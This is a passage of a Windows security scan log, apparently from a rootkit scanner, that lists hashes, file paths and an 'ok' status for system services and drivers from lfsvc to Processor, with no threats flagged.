12:54:49.0274 0x1004 [ 8B9F3796EC1762CF255BDB324E5529C8, F73D6BEF19BE20AEB18DA82CB63E9D8B50ACBBE4ED9B646EF0C9F598F6B81F94 ] lfsvc C:\WINDOWS\System32\GeofenceMonitorService.dll
12:54:49.0336 0x1004 lfsvc - ok
12:54:49.0367 0x1004 [ C09010B3680860131631F53E8FE7BAD8, 35F2A06D5F29478D22ABDCC20DA893EF9D96504C65594A0CEA674D1C21B04FF8 ] lltdio C:\WINDOWS\system32\DRIVERS\lltdio.sys
12:54:49.0399 0x1004 lltdio - ok
12:54:49.0430 0x1004 [ DAE98CC96C5EE308BF4EA7B18F226CB8, 7A6CC56BF075010707715AB6608764291E358EDF27C806A025532869004C686B ] lltdsvc C:\WINDOWS\System32\lltdsvc.dll
12:54:49.0461 0x1004 lltdsvc - ok
12:54:49.0508 0x1004 [ 95DD1E89A772A383E0FDC677A2E2ED44, 94701ACC1F4D5422CB7084609BC25D34A05F68829DB5030AA6697BD7DBC3B0B2 ] LMDriver C:\WINDOWS\System32\drivers\LMDriver.sys
12:54:49.0508 0x1004 LMDriver - ok
12:54:49.0555 0x1004 [ 1E2662D847B7D9995C65D90D254A7E0F, AFD4063D2071FFCB6B0EAC0715276D986F42326919C86E525DCE12E1109A93E2 ] lmhosts C:\WINDOWS\System32\lmhsvc.dll
12:54:49.0586 0x1004 lmhosts - ok
12:54:49.0618 0x1004 [ 9CA9CB0E115418F90FFC67973462280A, E3B25C360A9F5A614206B6AD07E67B2AF71D667E3CDC56BAC11F4C5AD0BACAA6 ] LMS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
12:54:49.0633 0x1004 LMS - ok
12:54:49.0711 0x1004 [ E1A37D1BF2F57345D078C324693F6A38, 99EF79344DB7EB1EBCABA716112FD23A350574BD67C451F421207E5341704504 ] LMSvc C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
12:54:49.0727 0x1004 LMSvc - ok
12:54:49.0774 0x1004 [ C755AE4635457AA2A11F79C0DF857ABC, E03D1ACAC155287291FE1BD0B653953ADC94279A74D0152088D698FAA796460F ] LSI_SAS C:\WINDOWS\system32\drivers\lsi_sas.sys
12:54:49.0789 0x1004 LSI_SAS - ok
12:54:49.0805 0x1004 [ ADAC09CBE7A2040B7F68B5E5C9A75141, 7865DA7E91404F3642BC444B97F6B7AA42B9523D5EDD7F6365DA236B8EC3410F ] LSI_SAS2 C:\WINDOWS\system32\drivers\lsi_sas2.sys
12:54:49.0821 0x1004 LSI_SAS2 - ok
12:54:49.0821 0x1004 [ 04D1274BB9BBCCF12BD12374002AA191, 4B9618F8D25F2278DE1610A70ACAADB074D171D162C3AF27D464F5DC800A8E60 ] LSI_SAS3 C:\WINDOWS\system32\drivers\lsi_sas3.sys
12:54:49.0836 0x1004 LSI_SAS3 - ok
12:54:49.0868 0x1004 [ 327469EEF3833D0C584B7E88A76AEC0C, 3D88B5A2D68F93F01B39C6E3D8D5C7A2A20686EFC756086E66AFFF1BC3019B85 ] LSI_SSS C:\WINDOWS\system32\drivers\lsi_sss.sys
12:54:49.0883 0x1004 LSI_SSS - ok
12:54:49.0930 0x1004 [ 9A7A7E45DAED2E8C2816716D8D28236A, C94787988826E546A8DC752BD6BE4EA7423DC3762B2D371DB297A63F865A95FF ] LSM C:\WINDOWS\System32\lsm.dll
12:54:49.0993 0x1004 LSM - ok
12:54:50.0039 0x1004 [ DDEE191AB32DFC22C6465002ECDF5EE4, 190C3930A8449118F9FEDF43C482837EF1C255E6D67F9651156E66A1E2BC6553 ] luafv C:\WINDOWS\system32\drivers\luafv.sys
12:54:50.0071 0x1004 luafv - ok
12:54:50.0086 0x1004 [ EB5C03A070F30D64A6DF80E53B22F53F, 12051B6AEBDEE1E28F24364F25A52BA3A6E282ECF86D6290E34BD38E6D4E066D ] megasas C:\WINDOWS\system32\drivers\megasas.sys
12:54:50.0102 0x1004 megasas - ok
12:54:50.0149 0x1004 [ F6F13533196DE7A582D422B0241E4363, B3CD9B08937AFFF12141B38634AF3A56F5AC5FF3EF03941802B9841DEC559469 ] megasr C:\WINDOWS\system32\drivers\megasr.sys
12:54:50.0164 0x1004 megasr - ok
12:54:50.0211 0x1004 [ 772A1DEEDFDBC244183B5C805D1B7D85, 7D821B8DF1F174E5414FFDEAB5207DB687740E9842F7203600AEBA086945AFC9 ] MEIx64 C:\WINDOWS\System32\drivers\HECIx64.sys
12:54:50.0227 0x1004 MEIx64 - ok
12:54:50.0274 0x1004 Microsoft SharePoint Workspace Audit Service - ok
12:54:50.0321 0x1004 [ 4C5179DB61B9E14BEC15CDC4B152B2E9, 9048BEC7AD6A3F4B640E99B1F0365AC9A46740B188758FBB2C160EF30AD6E64B ] MMCSS C:\WINDOWS\system32\mmcss.dll
12:54:50.0368 0x1004 MMCSS - ok
12:54:50.0399 0x1004 [ 8B38C44F69259987C95135C9627E2378, E698B82D4EFFF56D66C7FC9866369BA5736FDBDBE2028CC421C51E70DEA74727 ] Modem C:\WINDOWS\system32\drivers\modem.sys
12:54:50.0430 0x1004 Modem - ok
12:54:50.0446 0x1004 [ 601589000CC90F0DF8DA2CC254A3CCC9, D1238A386C41B6C368D9A44B7C112C943995B5403E2A5B4B7346B266DDB0C5A0 ] monitor C:\WINDOWS\System32\drivers\monitor.sys
12:54:50.0477 0x1004 monitor - ok
12:54:50.0508 0x1004 [ 08374E4E5B8914DE6067CBA99F61E930, CBB1390D6523FC968BEDF78FD13699488621ACB2CD1DF55D1606316090548661 ] mouclass C:\WINDOWS\System32\drivers\mouclass.sys
12:54:50.0524 0x1004 mouclass - ok
12:54:50.0571 0x1004 [ 5FCBAB60598AE119E02B4C27DE6B99EA, 36F30094F700DE41C293047ACB49ED1961DD927BEDAD8DFDAB7023D4D24CB0DE ] mouhid C:\WINDOWS\System32\drivers\mouhid.sys
12:54:50.0633 0x1004 mouhid - ok
12:54:50.0664 0x1004 [ 9A788037D768809DFD677F4BA08A224A, E0686B3318F924E440ADA439D6671D44D3FF97C13D45C2E0A3A7B9E23DA38350 ] mountmgr C:\WINDOWS\system32\drivers\mountmgr.sys
12:54:50.0680 0x1004 mountmgr - ok
12:54:50.0711 0x1004 [ A43F5F2D3D71A902502D61E71A18C265, 9685DABFF80EFFFD28B9B12696BF4821F30989C8441EA0AA3FF0F03ED799AD9D ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
12:54:50.0727 0x1004 MozillaMaintenance - ok
12:54:50.0758 0x1004 [ 9352AEB710669624DA3F1A4057336A3E, D93523308096367BB87DFA22D643E57A1BABF254BD3A0B8A2165DD75488016B4 ] MPCKpt C:\WINDOWS\system32\DRIVERS\MPCKpt.sys
12:54:50.0774 0x1004 MPCKpt - ok
12:54:50.0868 0x1004 [ 620FC442033A897C6CCE02FFE55C045D, 8621FD51B52D516F875F6CBF7003873E38E1758EC3C653B68EEF4C54DDB54F9B ] MPCProtectService C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
12:54:50.0883 0x1004 MPCProtectService - ok
12:54:50.0930 0x1004 [ 6FC047578785B0435F4E2660946D1ADC, 8AEA5659F01FC2F75160922C69622502DABA39F33CB90D5178DD679A1CDE617D ] mpsdrv C:\WINDOWS\system32\drivers\mpsdrv.sys
12:54:51.0008 0x1004 mpsdrv - ok
12:54:51.0055 0x1004 [ C18AA14126ADC66478E8E962B2DFAA98, A6F8CE9D88D590DC083253004392572C3BD02C33433CD6C0D9117D2AA7171EEC ] MpsSvc C:\WINDOWS\system32\mpssvc.dll
12:54:51.0086 0x1004 MpsSvc - ok
12:54:51.0164 0x1004 [ D2AC8F07995CE6CD18848C129435B481, 839B04116B49A757950E049150F6AADE41335914CC699ED73BE886BECAC39D36 ] MRxDAV C:\WINDOWS\system32\drivers\mrxdav.sys
12:54:51.0211 0x1004 MRxDAV - ok
12:54:51.0258 0x1004 [ 61000E7155E92342D0D5338CE05D102A, BCFA1A82B9727040C496A84F42D4613B96EC445018BDFBF2E180889B1B561559 ] mrxsmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
12:54:51.0305 0x1004 mrxsmb - ok
12:54:51.0352 0x1004 [ BCBD64220AD85C26823453FF1DC3EFBD, 0245E3659E9135B9276F3CCFBEA0CEFFC4F4C0826F6D19B6329057620235F087 ] mrxsmb10 C:\WINDOWS\system32\DRIVERS\mrxsmb10.sys
12:54:51.0430 0x1004 mrxsmb10 - ok
12:54:51.0446 0x1004 [ B0A106352DEF6D52332EA39E00462EA7, 274422C1E172B673130944F2FF2A2D9A9A364CFFC02FD04DD7D6D45B34C5022A ] mrxsmb20 C:\WINDOWS\system32\DRIVERS\mrxsmb20.sys
12:54:51.0493 0x1004 mrxsmb20 - ok
12:54:51.0524 0x1004 [ F3C060444777A59FC63D920719E43CCD, 8766A2746E3DFB0749E902F458141269335CA6F0CEDCA3D5F8C204637C19E783 ] MsBridge C:\WINDOWS\system32\DRIVERS\bridge.sys
12:54:51.0571 0x1004 MsBridge - ok
12:54:51.0602 0x1004 [ 915747E010A9414B069173284A9B93F4, 8A335C28FE1EF96DD71485877F2E86155D24B5614ACE05468F4B07E2ACD56331 ] MSDTC C:\WINDOWS\System32\msdtc.exe
12:54:51.0633 0x1004 MSDTC - ok
12:54:51.0664 0x1004 [ D13329FBF8345B28AB30F44CC247DC08, 9C7EC2D4D65E6510EB5B9E61BB0D14F725D7E8FE98D65161C3971E43EF1AB6EB ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
12:54:51.0696 0x1004 Msfs - ok
12:54:51.0727 0x1004 [ C6B474E46F9E543B875981ED3FFE6ADD, E16687E52FB649C23D92159A1F036CB662202C1E58D961EECDAA528AA4FA669A ] msgpiowin32 C:\WINDOWS\System32\drivers\msgpiowin32.sys
12:54:51.0743 0x1004 msgpiowin32 - ok
12:54:51.0758 0x1004 [ 65C92EB9D08DB5C69F28C7FFD4E84E31, D709BA4723225321F665B1157A33A4AE230420752308EF535DA9A41CAC164628 ] mshidkmdf C:\WINDOWS\System32\drivers\mshidkmdf.sys
12:54:51.0789 0x1004 mshidkmdf - ok
12:54:51.0821 0x1004 [ 52299F086AC2DAFD100DD5DC4A8614BA, B36BE0FC96798E5EB8C193C318970E3906961E3ABC3BFAAD73138C76D9A95B0B ] mshidumdf C:\WINDOWS\System32\drivers\mshidumdf.sys
12:54:51.0852 0x1004 mshidumdf - ok
12:54:51.0868 0x1004 [ 36D92AF3343C3A3E57FEF11C449AEA4C, ECC85AA1E530DF55B4A4545798219F87F0FCA66DDD2E37BCEF0850D3C9129DD2 ] msisadrv C:\WINDOWS\system32\drivers\msisadrv.sys
12:54:51.0883 0x1004 msisadrv - ok
12:54:51.0915 0x1004 [ 4EAEEBAC8CFF4E0D717DFA920BC58A90, A65CB1BB3392B6A04B978348CAC18A414560A6B04A727F22DFC0ADB20DD3AF6B ] MSiSCSI C:\WINDOWS\system32\iscsiexe.dll
12:54:51.0946 0x1004 MSiSCSI - ok
12:54:51.0946 0x1004 msiserver - ok
12:54:51.0977 0x1004 [ A9BBBD2BAE6142253B9195E949AC2E8D, 599D2952D4E0B0B3E02D91E38A30F4900B1ADA330716B887B156A1CB9A3E6EE9 ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys
12:54:52.0008 0x1004 MSKSSRV - ok
12:54:52.0040 0x1004 [ 51B3AC0560848CD6D65AC2033E293113, 73A27E88774C6929328E6C9FC9C389F4DF76D4D4D5CBFC4F51651CC308829628 ] MsLldp C:\WINDOWS\system32\DRIVERS\mslldp.sys
12:54:52.0086 0x1004 MsLldp - ok
12:54:52.0102 0x1004 [ 7B2128EB875DCBC006E6A913211006D6, 97BBD7FF770741FBFC0F181A609AD0954EA926DA203B742E8F08C89AD8FE476E ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys
12:54:52.0118 0x1004 MSPCLOCK - ok
12:54:52.0133 0x1004 [ 1E88171579B218115C7A772F8DE04BD8, B9EAA835D0BF8F9C4DF8403D95EF1400E8AE38F28F9DBA87657DE2129FEF02D2 ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys
12:54:52.0149 0x1004 MSPQM - ok
12:54:52.0180 0x1004 [ BBE2A455053E63BECBF42C2F9B21FAE0, 7C5DF563499DF59DF9895A1581E47ADF5FD54C94ECEF6C886CDB60E5E95A6DAE ] MsRPC C:\WINDOWS\system32\drivers\MsRPC.sys
12:54:52.0196 0x1004 MsRPC - ok
12:54:52.0227 0x1004 [ 8D6B7D515C5CBCDB75B928A0B73C3C5E, 1EB4DC3DD21D2627C78EC3F9931D9E5D033169087E43B5D7C17BF1FF2A0028CD ] mssmbios C:\WINDOWS\System32\drivers\mssmbios.sys
12:54:52.0227 0x1004 mssmbios - ok
12:54:52.0258 0x1004 [ 115019AE01E0EB9C048530D2928AB4A2, 6E2275E85EACF2D0FC784792E0D72A165589D33CBAB3BCFA8E271CA09566C925 ] MSTEE C:\WINDOWS\system32\drivers\MSTEE.sys
12:54:52.0274 0x1004 MSTEE - ok
12:54:52.0305 0x1004 [ 96D604A35070360F0DD4A7A8AF410B5E, F94DD1A3566C7C8D0A76D6E1E2530552A9B7F99C5DA0DE11829325EAB9F8B7ED ] MTConfig C:\WINDOWS\System32\drivers\MTConfig.sys
12:54:52.0368 0x1004 MTConfig - ok
12:54:52.0399 0x1004 [ 619CA29326B82372621DB2C0964D8365, 4091F08E266DB45A6E33A4A8B1CE9FA78BB294B3111526AA9E3868620F30AFDF ] Mup C:\WINDOWS\system32\Drivers\mup.sys
12:54:52.0399 0x1004 Mup - ok
12:54:52.0415 0x1004 [ B8C35C94DCB2DFEAF03BB42131F2F77F, F0FCF367CA8F722D6ABCF7F363CD406D890D71452E91C3FC6677B47AD74D6324 ] mvumis C:\WINDOWS\system32\drivers\mvumis.sys
12:54:52.0430 0x1004 mvumis - ok
12:54:52.0477 0x1004 [ 8DF30698BDD9492A9D45A4B94FB4A82A, 26B1B2D7E785E29B8BCB74C467C66AE4EBDD481ACFF36334F3BDF4506B778244 ] napagent C:\WINDOWS\system32\qagentRT.dll
12:54:52.0508 0x1004 napagent - ok
12:54:52.0555 0x1004 [ 008F7CED69FD5B30CBDE1E03C6F36A27, D4ADA7834C470B17A3CD976012DC5A511B32545B9F91D23D09A85722E0B75320 ] NativeWifiP C:\WINDOWS\system32\DRIVERS\nwifi.sys
12:54:52.0618 0x1004 NativeWifiP - ok
12:54:52.0711 0x1004 [ E59AFB64C2F6E0C99350E1C944C75088, 10A9044192D0A83857A57286EABB05037922860483DA2B05AFCC485A8311E4EF ] NAUpdate c:\Program Files (x86)\Nero\Update\NASvc.exe
12:54:52.0743 0x1004 NAUpdate - ok
12:54:52.0805 0x1004 [ BFCE1225D10619029E68946929CEB64C, 499F560331FFBA82E3D673B47F027FDAB7BEE4F2CB5B811D69E0218839F6E6A5 ] NcaSvc C:\WINDOWS\System32\ncasvc.dll
12:54:52.0852 0x1004 NcaSvc - ok
12:54:52.0899 0x1004 [ 267C97373110B7AFD3B46DF60B6CBB85, CEBB99F71D47634BB9C04DF2836DF6B47F15B3073FEFC237F85526DF01E4E38B ] NcbService C:\WINDOWS\System32\ncbservice.dll
12:54:52.0930 0x1004 NcbService - ok
12:54:52.0961 0x1004 [ 0813B71EAF097208DC76CE0605B48AF0, A93A2E6A8FB77B58AC4D580E6F8BF307A25BADC9493994F9BE235EBFB0E1DB22 ] NcdAutoSetup C:\WINDOWS\System32\NcdAutoSetup.dll
12:54:52.0993 0x1004 NcdAutoSetup - ok
12:54:53.0055 0x1004 [ 97DC5967F65503213FD1F1B3E4A6F983, 3EC515856C7CE9B30032F963DC04190F66EE62402A819781DC45B7D088C84229 ] NDIS C:\WINDOWS\system32\drivers\ndis.sys
12:54:53.0102 0x1004 NDIS - ok
12:54:53.0165 0x1004 [ 8CECC8DA55F3274181FD1EA28AD76664, 188112424CEF97FB926A0FB915260B803555A775DD2E1846725A9C8616300F42 ] NdisCap C:\WINDOWS\system32\DRIVERS\ndiscap.sys
12:54:53.0196 0x1004 NdisCap - ok
12:54:53.0227 0x1004 [ 269882812E9A68FFF1AFE1283D428322, 50B99EBC42DA9B46A8C2C28C9BADCF58AE3079535CDD1227D0F5C86291C715FF ] NdisImPlatform C:\WINDOWS\system32\DRIVERS\NdisImPlatform.sys
12:54:53.0290 0x1004 NdisImPlatform - ok
12:54:53.0321 0x1004 [ DC1D9F692C2AD84C214584C28501C1F7, 96FC0D1EC48FED963E02648541A2AAC8E72ED00D797EA8E3D0ED02F5EB4816C5 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
12:54:53.0383 0x1004 NdisTapi - ok
12:54:53.0399 0x1004 [ B832B35055BA2B7B4181861FF94D8E59, 2E60E5D503E88D27E35ECFEE265D51328E93A9C7B9B931F86D9CBC947636BB00 ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys
12:54:53.0430 0x1004 Ndisuio - ok
12:54:53.0430 0x1004 [ 1F58E48EF75F34C35D8E93A0DC535CFE, D65619A6C4B1747F8B05DA08A44EF0E46B5CC384880E04E4755A2BA6CDB3C4EA ] NdisVirtualBus C:\WINDOWS\System32\drivers\NdisVirtualBus.sys
12:54:53.0461 0x1004 NdisVirtualBus - ok
12:54:53.0493 0x1004 [ DEC29080202D4F9F17F55E18BCFCC41A, F7E543741B1F4F637A99C40543D6AEC6EBF893F74359BBA769D1F882E0AFB571 ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys
12:54:53.0524 0x1004 NdisWan - ok
12:54:53.0524 0x1004 [ DEC29080202D4F9F17F55E18BCFCC41A, F7E543741B1F4F637A99C40543D6AEC6EBF893F74359BBA769D1F882E0AFB571 ] NdisWanLegacy C:\WINDOWS\system32\DRIVERS\ndiswan.sys
12:54:53.0555 0x1004 NdisWanLegacy - ok
12:54:53.0571 0x1004 [ 0BBE2FA30BAD58C9ADC01E4F84A3D2A1, 913AEC8A5F735C2EFDCB417E4077AB5A15457C601E6E88A1F4FA52C91E6E0BBF ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys
12:54:53.0602 0x1004 NDProxy - ok
12:54:53.0649 0x1004 [ 3083926D1CC5B56EA0786527B557DD1B, 3C3F0CA0D43398576DBE8F677B353ADDA7E8F56829874958CE668E31261C1590 ] Ndu C:\WINDOWS\system32\drivers\Ndu.sys
12:54:53.0712 0x1004 Ndu - ok
12:54:53.0743 0x1004 [ 42FF4975D032CAE558AE4BB8448F6E5A, 0B8FACF3382443DED79A8004A6AA14C32471A6A1C6BAA543AA9F3FEC52620A6D ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys
12:54:53.0774 0x1004 NetBIOS - ok
12:54:53.0821 0x1004 [ 0217532E19A748F0E5D569307363D5FD, C40C2E7AFA276057E7327A7BB173122689D6CEC9AE443C3850C3F94AF03DFBF5 ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
12:54:53.0868 0x1004 NetBT - ok
12:54:53.0883 0x1004 [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] Netlogon C:\WINDOWS\system32\lsass.exe
12:54:53.0899 0x1004 Netlogon - ok
12:54:53.0946 0x1004 [ 8F074B62E66B6117D9598C62A12069C5, 5FDB19045D3E2F6D0F0C5158AC2ECB0D5404CD2AF7A319755D7E3753CA3B7CF3 ] Netman C:\WINDOWS\System32\netman.dll
12:54:53.0977 0x1004 Netman - ok
12:54:54.0040 0x1004 [ 4A04B1CD5BFB4A978C5F60E86D6C3E45, A946922C1C38ADD3CF9D3B09DDCC301AE4DAC960A081B2F42B32BE1E7095B3FD ] netprofm C:\WINDOWS\System32\netprofmsvc.dll
12:54:54.0071 0x1004 netprofm - ok
12:54:54.0102 0x1004 [ 1092B3190E69E0C5ECBCE90F171DE047, C16106EEFC324EE80E5F659CB71A5DD69FA800D36D829F5B0E6AD3393BD1BAF7 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
12:54:54.0118 0x1004 NetTcpPortSharing - ok
12:54:54.0165 0x1004 [ D4DCE03870314D3354F3501F9DDD4123, 5BFE8299B3F72B8C39A4965365CBF5BA151024451F02DD872FAD1CC35CF94CEA ] netvsc C:\WINDOWS\System32\drivers\netvsc63.sys
12:54:54.0227 0x1004 netvsc - ok
12:54:54.0274 0x1004 [ E94EB2A95D7D016E119C4D6868788831, 3E4A925D23262FBA0A6432DD635FBE94B0CEF76BD9BB323254B66977497FEE2A ] NlaSvc C:\WINDOWS\System32\nlasvc.dll
12:54:54.0321 0x1004 NlaSvc - ok
12:54:54.0337 0x1004 [ 8F44A2F57C9F1A19AC9C6288C10FB351, 310274DDBAC0FE4BE54ECD3B90C97D82A0F9F5CFCA7A35711A36164DE4B94074 ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
12:54:54.0602 0x1004 Npfs - ok
12:54:54.0649 0x1004 [ CBDB4F0871C88DF930FC0E8588CA67FC, 7E4AA3EA81A9D532F236FD7896744F07ED07CA9B37A9F18A9778BCCCC67490F2 ] npsvctrig C:\WINDOWS\System32\drivers\npsvctrig.sys
12:54:54.0696 0x1004 npsvctrig - ok
12:54:54.0712 0x1004 [ 0F12A72A753CFD7FB0631EE8D08FE983, 860A96471F6CD90DDA9AB3A48E95CEAD826C87D2FA98A00EF91B61C44A4C8B82 ] nsi C:\WINDOWS\system32\nsisvc.dll
12:54:54.0758 0x1004 nsi - ok
12:54:54.0790 0x1004 [ 0E046FF5823B95326D10CF1B4AF23541, 39D22715003746527AB4BFEDED8C34B695DAF589091AE7F3A2A2C4B8A35675A9 ] nsiproxy C:\WINDOWS\system32\drivers\nsiproxy.sys
12:54:54.0821 0x1004 nsiproxy - ok
12:54:54.0977 0x1004 [ 7F68063A5A0461E02BC860CE0E6BFDDC, 47E9F75D27B97278B74034B7D3951A26B1644911ED321455E08D935731C858DE ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys
12:54:55.0071 0x1004 Ntfs - ok
12:54:55.0118 0x1004 [ EF1B290FC9F0E47CC0B537292BEE5904, DBC07BBC54EBC2D2E576B23A4CE116B3DA988577AD0D96CB7289A6748A60F9EA ] Null C:\WINDOWS\system32\drivers\Null.sys
12:54:55.0133 0x1004 Null - ok
12:54:55.0165 0x1004 [ BC6B5942AFF25EBAF62DE43C3807EDF8, CB0FA194084B8C309039D571B5760FDA800E9531B8660C499B4F9977BA5C36D5 ] nvraid C:\WINDOWS\system32\drivers\nvraid.sys
12:54:55.0165 0x1004 nvraid - ok
12:54:55.0180 0x1004 [ 1F43ABFFAC3D6CA356851D517392966E, 6FD7621F67BA94B0E1D8F43BEC2951DBCDEEA1E848BB265AC169E27C01DA68F2 ] nvstor C:\WINDOWS\system32\drivers\nvstor.sys
12:54:55.0212 0x1004 nvstor - ok
12:54:55.0227 0x1004 [ 6934A936A7369DFE37B7DBA93F5E5E49, 0900FEEB0CE8D09F0FC60630B5B986034A8BCD3882ED66E47170810C32492892 ] nv_agp C:\WINDOWS\system32\drivers\nv_agp.sys
12:54:55.0243 0x1004 nv_agp - ok
12:54:55.0290 0x1004 [ 9D10F99A6712E28F8ACD5641E3A7EA6B, 70964A0ED9011EA94044E15FA77EDD9CF535CC79ED8E03A3721FF007E69595CC ] ose C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
12:54:55.0305 0x1004 ose - ok
12:54:55.0508 0x1004 [ 61BFFB5F57AD12F83AB64B7181829B34, 1DD0DD35E4158F95765EE6639F217DF03A0A19E624E020DBA609268C08A13846 ] osppsvc C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
12:54:55.0680 0x1004 osppsvc - ok
12:54:55.0743 0x1004 [ 26657F3B4F39A0E64AF859278B599C4E, 3DD65E0BCEF3045DBA29FB8171CA3FCC9781AED3A1C7A160CF26388CE80A3683 ] p2pimsvc C:\WINDOWS\system32\pnrpsvc.dll
12:54:55.0774 0x1004 p2pimsvc - ok
12:54:55.0805 0x1004 [ FD8F61F0D1F64BBB3D835F39A3F979C9, E5C5F86576488EA7F605E26C06EE5AFB36506A446F60C894D55E0A148BF7F02D ] p2psvc C:\WINDOWS\system32\p2psvc.dll
12:54:55.0852 0x1004 p2psvc - ok
12:54:55.0868 0x1004 [ 764B1121867B2D9B31C491668AC72B2B, 32C04B6FCE1DDD09697B81473A23BDCED8BEEFBCD0D2D58DDC9A11A33C756967 ] Parport C:\WINDOWS\System32\drivers\parport.sys
12:54:55.0883 0x1004 Parport - ok
12:54:55.0915 0x1004 [ BAFF6122CFC9F95CA175AD8C348179A4, 079A912D951DF6A57BC1BDB0D182977EE9592751EC9DDCDA2932BDEDB333850C ] partmgr C:\WINDOWS\system32\drivers\partmgr.sys
12:54:55.0930 0x1004 partmgr - ok
12:54:55.0993 0x1004 [ ABE95ABE27A8BD9701782BBCD82C9925, AE3BA1E9ECDE692374D8DAC95A8DAA289DD2470E3D8D58EFAD9F83A37F3AC8E5 ] PcaSvc C:\WINDOWS\System32\pcasvc.dll
12:54:56.0040 0x1004 PcaSvc - ok
12:54:56.0071 0x1004 [ 91ED124E261EA8FAA1C0FFDF2A71B0C4, 20E41A38067395D03184938983A9BE459717A1941352972DBC28D83D542319EC ] pci C:\WINDOWS\system32\drivers\pci.sys
12:54:56.0087 0x1004 pci - ok
12:54:56.0149 0x1004 [ 346E38FCC6859A727DD28AFAD1F0AFF4, FF3DA26F79B3BC3A5B8A8AA0B9139B9EF70297F4EA1203B1E68FB5A212C3AA58 ] pciide C:\WINDOWS\system32\drivers\pciide.sys
12:54:56.0165 0x1004 pciide - ok
12:54:56.0180 0x1004 [ 4D3BDCC1C7B40C9D7B6AD990E6DEC397, 27A7AF2127B699F4579CB77936F38DC102211E26E5E2947DB808756FE06FC98E ] pcmcia C:\WINDOWS\system32\drivers\pcmcia.sys
12:54:56.0196 0x1004 pcmcia - ok
12:54:56.0212 0x1004 [ BF28771D1436C88BE1D297D3098B0F7D, 5F7630916A76A8CF31289E9C577F522B999C74C39E541CD40E62BD53004BEF74 ] pcw C:\WINDOWS\system32\drivers\pcw.sys
12:54:56.0212 0x1004 pcw - ok
12:54:56.0243 0x1004 [ ED54A75050211DC77F9B98C41E026858, F92FB59ADE88469EAA50E91D43165C68CC32FDE11595A0069FD43103A674FE44 ] pdc C:\WINDOWS\system32\drivers\pdc.sys
12:54:56.0258 0x1004 pdc - ok
12:54:56.0305 0x1004 [ 0ECEE590F2E2EF969FB74A6FC583A1E6, 1C611D9225C863CF32125F684B324C58BDE1942F4F283F5674133200AC505D44 ] PEAUTH C:\WINDOWS\system32\drivers\peauth.sys
12:54:56.0383 0x1004 PEAUTH - ok
12:54:56.0462 0x1004 [ 8E3C640FFF5A963F570233AE99C0FFF3, 3DE978B005BF2E88BA858CE37D9E27BD3584642B8412E22C300A1E739743838A ] PerfHost C:\WINDOWS\SysWow64\perfhost.exe
12:54:56.0493 0x1004 PerfHost - ok
12:54:56.0571 0x1004 [ 70B39E7241F750A248798CE82C44596D, 54A72199EB277EE586611DCBC21654786FD2196F91D5884C4F531297893CC3EC ] pla C:\WINDOWS\system32\pla.dll
12:54:56.0680 0x1004 pla - ok
12:54:56.0712 0x1004 [ 2C02AFF8383D893F8DBEB07A84F6E77C, 7CC34BAC67E2988E3D16DD6EB6F6785CD2460E3EF7FBD0BD5F86E49793BD473E ] PlugPlay C:\WINDOWS\system32\umpnpmgr.dll
12:54:56.0727 0x1004 PlugPlay - ok
12:54:56.0758 0x1004 [ 4570F8A37D221660F3A09D6F4DD4BA94, 0EA190CFFA53DF9CCA2D53A4EF1BCB837BA3F2489A3AC5BD11F6D6ED811D118E ] PNRPAutoReg C:\WINDOWS\system32\pnrpauto.dll
12:54:56.0790 0x1004 PNRPAutoReg - ok
12:54:56.0821 0x1004 [ 26657F3B4F39A0E64AF859278B599C4E, 3DD65E0BCEF3045DBA29FB8171CA3FCC9781AED3A1C7A160CF26388CE80A3683 ] PNRPsvc C:\WINDOWS\system32\pnrpsvc.dll
12:54:56.0837 0x1004 PNRPsvc - ok
12:54:56.0868 0x1004 [ BDD52AB4AEBB8B1904568DBD0CCB70CB, C3D1DBA349C79B43DCDD9EF5255C5EE973EFB844235B808B5EF9B63A51FF00AA ] PolicyAgent C:\WINDOWS\System32\ipsecsvc.dll
12:54:56.0899 0x1004 PolicyAgent - ok
12:54:56.0962 0x1004 [ C8DD82C3035E60D671B8CC5DF128D3A9, 6AABF632CBEDA9A7B553BC9134FF100CB6FDC88000D499D2883408FCEDD97576 ] Power C:\WINDOWS\system32\umpo.dll
12:54:57.0009 0x1004 Power - ok
12:54:57.0040 0x1004 [ E075CC071022BD4E9BE7C024717C0E0A, BE65A8C1082AE8DF8C37CA06B2BCC521478AC153EA7388B03F7FAE3913920E75 ] PptpMiniport C:\WINDOWS\system32\DRIVERS\raspptp.sys
12:54:57.0071 0x1004 PptpMiniport - ok
12:54:57.0352 0x1004 [ 346F352E17EA5793C726D3F6582BA855, 5CD830CDCC73335EDC58D26D1BC8B8830DA885CA6D1E21BB7EE763354B5C35EA ] PrintNotify C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll
12:54:57.0493 0x1004 PrintNotify - ok
12:54:57.0540 0x1004 [ ECD373F9571C745894367CC2635EA44F, E08B2A1017DAE1BF10B986DAFAD14BDE20D79703E0EF3A8C700A3753908C1392 ] Processor C:\WINDOWS\System32\drivers\processr.sys
12:54:57.0571 0x1004 Processor - ok
